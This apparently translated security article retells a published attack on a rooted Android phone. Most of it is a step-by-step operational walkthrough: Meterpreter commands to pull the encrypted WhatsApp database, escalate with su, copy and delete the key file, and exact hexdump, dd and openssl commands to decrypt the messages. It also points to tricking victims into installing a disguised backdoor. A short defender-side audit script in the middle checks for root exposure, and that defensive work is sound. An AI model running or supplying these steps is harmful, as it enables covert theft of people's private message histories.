Decryption: How Attackers Obtain Your WhatsApp Database, Step by Step
This document describes how to remotely attack and decrypt the WhatsApp database on a rooted Android device. It is also a reminder that rooted (Android) or jailbroken (iOS) devices expose their users to attack.
A few hours ago, an interesting article entitled "How to remotely crack and decrypt the WhatsApp database [ROOT]" was published on the Internet. The article explains how to extract and decrypt the WhatsApp database from a rooted Android system. Although WhatsApp is usually very secure, rooting an Android device can expose its user to this kind of attack.
Next, let's take a look at the attack scenario proposed by the author (who writes under the pseudonym F. E. A. R.).
Step 1: Gain access to the Android device
As explained in this guide, this phase is straightforward if the attacker already has a Meterpreter session on a rooted Android device.
To decrypt the WhatsApp database, the attacker needs a key file stored in the app's data folder. The only way to read this file is with root permissions, and without it the database cannot be decrypted.
Step 2: Download the database
Use the following Meterpreter commands to download the database:
cd /sdcard/WhatsApp
ls (list the current directory)
cd Databases
download msgstore.db.crypt8 (this may take a while)
Step 3: Extract the decryption key
The key file required to decrypt the WhatsApp database holds two values: the actual encryption key K and an initialization vector (IV). It is worth noting that the key file lives in WhatsApp's private data directory, which is not readable without root. The following commands obtain the root shell needed to reach it:
shell
su (Super User access, i.e. privilege escalation)
As F. E. A. R. explains, this is the most difficult part, especially if the target is an experienced and skilled user, because such a user will have installed the SuperSU application, which prompts before granting root access.
How to induce victims to install SuperSU?
Let's take a look at this tutorial published by bart, which explains how to disguise a backdoor application. However, the process becomes simpler if the victim is not an experienced or skilled user and one of the following applies:
1. They have not installed the SuperSU application.
2. SuperSU's default access for newly installed applications is left at GRANT rather than changed to PROMPT.
Run the following commands to enter the key folder and extract the decryption key:
cd /data/data
ls
cd com.whatsapp
ls
cd files
ls
cp key /sdcard/Download (copies the key file to the /sdcard/Download folder)
Step 4: Download the key file to the root directory
Download the extracted key file to the root directory, which also contains the encrypted WhatsApp database:
cd /sdcard/Download
download key
rm key (make sure the copied key file is deleted from the device)
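Everything the attack needs so far is checkable from the defender's side: a su binary on the device, a SuperSU install whose default policy may still be GRANT, a key file readable by more than its owner, and the copy of the key the attacker leaves in /sdcard/Download. The following POSIX shell script is an added example, not code from the original article or its author, that a device owner or incident responder can run against a device filesystem, a mounted image, or a scratch directory to report those four indicators. It assumes the SuperSU package name eu.chainfire.supersu and the key path /data/data/com.whatsapp/files/key used in the article; the su locations are the conventional ones, and the stat invocation targets GNU/BSD stat rather than Android's toolbox, so on-device use may need that line adjusted.

```shell
#!/bin/sh
# Added defender-side audit, not part of the original article.
# Usage: sh audit.sh [ROOT]   (ROOT defaults to /; pass a mounted image
# or a scratch directory to check a copy instead of the live device)

# Prints one line per root-exposure indicator found under ROOT.
# Prints nothing when none of the four indicators is present.
root_exposure_findings() {
    root="${1:-/}"

    # 1. A su binary in any of the usual locations means the device is rooted.
    for su in system/bin/su system/xbin/su sbin/su; do
        if [ -e "$root/$su" ]; then
            echo "ROOTED: su binary present at /$su"
        fi
    done

    # 2. SuperSU's data directory (package eu.chainfire.supersu, assumed here)
    #    holds its access policy; the default for new apps should be PROMPT.
    if [ -d "$root/data/data/eu.chainfire.supersu" ]; then
        echo "SUPERSU: eu.chainfire.supersu installed; confirm default access is PROMPT, not GRANT"
    fi

    # 3. The attack copies the WhatsApp key file to shared storage;
    #    a leftover copy is a direct artifact of a successful extraction.
    if [ -e "$root/sdcard/Download/key" ]; then
        echo "ARTIFACT: copy of the WhatsApp key file found in /sdcard/Download"
    fi

    # 4. The key file itself (path taken from the article) must not be
    #    world-readable; check the 'other' permission bits for read (4-7).
    keyfile="$root/data/data/com.whatsapp/files/key"
    if [ -e "$keyfile" ]; then
        perms=$(stat -c %a "$keyfile" 2>/dev/null || stat -f %Lp "$keyfile" 2>/dev/null)
        case "$perms" in
            *[4567]) echo "PERMS: $keyfile is world-readable (mode $perms)" ;;
        esac
    fi
    return 0
}

# Stand-alone run: report on the requested root (default /).
findings=$(root_exposure_findings "${1:-/}")
if [ -n "$findings" ]; then
    echo "$findings"
else
    echo "no root-exposure indicators found under ${1:-/}"
fi
```

An empty report means none of the four indicators was present; any ROOTED or SUPERSU line is a configuration risk to review, while an ARTIFACT or PERMS line warrants treating the key, and therefore the database, as already exposed.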
Step 5: Decrypt the WhatsApp database
The article reports two different methods for decrypting the WhatsApp database:
(1) Run the following Linux commands one at a time, copying and pasting each; the author notes that putting them in a script file did not work properly:
hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
gzip -cdq msgstore.gz > msgstore.db
If the command on the 4th line does not work, skip the intermediate files and paste the hex strings directly:
hexdump -e '2/1 "%02x"' key | cut -b 253-316
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (paste the output of the 1st command) -iv (paste the output of the 2nd command) > msgstore.gz
(2) The second method uses the simple Windows application WhatsApp Viewer; see the original article for details.
The lesson, once again: rooting (Android) or jailbreaking (iOS) a mobile device exposes its user to attacks like this one.